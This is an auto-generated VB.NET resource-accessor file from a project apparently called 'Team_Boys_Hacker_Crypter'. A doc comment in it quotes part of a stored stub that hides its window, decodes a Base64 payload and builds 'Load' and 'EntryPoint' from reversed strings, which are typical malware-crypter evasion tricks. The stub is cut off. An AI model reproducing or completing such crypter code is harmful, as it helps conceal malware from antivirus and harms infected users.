'------------------------------------------------------------------------------
' <auto-generated>
'     This code was generated by a tool.
'     Runtime Version:4.0.30319.42000
'
'     Changes to this file may cause incorrect behavior and will be lost if
'     the code is regenerated.
' </auto-generated>
'------------------------------------------------------------------------------

Option Strict On
Option Explicit On

Imports System

Namespace My.Resources
    
    'This class was auto-generated by the StronglyTypedResourceBuilder
    'class via a tool like ResGen or Visual Studio.
    'To add or remove a member, edit your .ResX file then rerun ResGen
    'with the /str option, or rebuild your VS project.
    '''<summary>
    '''  A strongly-typed resource class, for looking up localized strings, etc.
    '''</summary>
    <Global.System.CodeDom.Compiler.GeneratedCodeAttribute("System.Resources.Tools.StronglyTypedResourceBuilder", "4.0.0.0"),  _
     Global.System.Diagnostics.DebuggerNonUserCodeAttribute(),  _
     Global.System.Runtime.CompilerServices.CompilerGeneratedAttribute(),  _
     Global.Microsoft.VisualBasic.HideModuleNameAttribute()>  _
    Friend Module Resources
        
        Private resourceMan As Global.System.Resources.ResourceManager
        
        Private resourceCulture As Global.System.Globalization.CultureInfo
        
        '''<summary>
        '''  Returns the cached ResourceManager instance used by this class.
        '''</summary>
        <Global.System.ComponentModel.EditorBrowsableAttribute(Global.System.ComponentModel.EditorBrowsableState.Advanced)>  _
        Friend ReadOnly Property ResourceManager() As Global.System.Resources.ResourceManager
            Get
                If Object.ReferenceEquals(resourceMan, Nothing) Then
                    Dim temp As Global.System.Resources.ResourceManager = New Global.System.Resources.ResourceManager("Team_Boys_Hacker_Crypter.Resources", GetType(Resources).Assembly)
                    resourceMan = temp
                End If
                Return resourceMan
            End Get
        End Property
        
        '''<summary>
        '''  Overrides the current thread's CurrentUICulture property for all
        '''  resource lookups using this strongly typed resource class.
        '''</summary>
        <Global.System.ComponentModel.EditorBrowsableAttribute(Global.System.ComponentModel.EditorBrowsableState.Advanced)>  _
        Friend Property Culture() As Global.System.Globalization.CultureInfo
            Get
                Return resourceCulture
            End Get
            Set
                resourceCulture = value
            End Set
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to Imports System.IO
        '''Public Class Form1
        '''Public Sub Form1_Load(sender As Object, e As EventArgs) Handles MyBase.Load
        '''Me.Hide()
        '''Me.ShowInTaskbar = False
        '''Me.ShowIcon = False
        '''Me.Opacity = 0
        '''maloumat
        '''Dim str2 As String = &quot;&quot;
        '''Dim num3 As Integer = pp1.Length
        '''Dim i As Integer = 1 
        '''Do While (i &lt;= num3) 
        '''str2 = rahj
        '''i += 1
        '''Loop
        '''Dim best = Convert.FromBase64String(UnZip(str2))
        '''        Dim y1 As Object = StrReverse(&quot;da&quot; &amp; &quot;oL&quot;)
        '''        Dim y2 As Object = StrReverse(&quot;tniop&quot; &amp; &quot;yrtnE&quot;)
        '''        Dim y3 As Ob [rest of string was truncated]&quot;;.
        '''</summary>
        Friend ReadOnly Property Haxor() As String
            Get
                Return ResourceManager.GetString("Haxor", resourceCulture)
            End Get
        End Property
    End Module
End Namespace
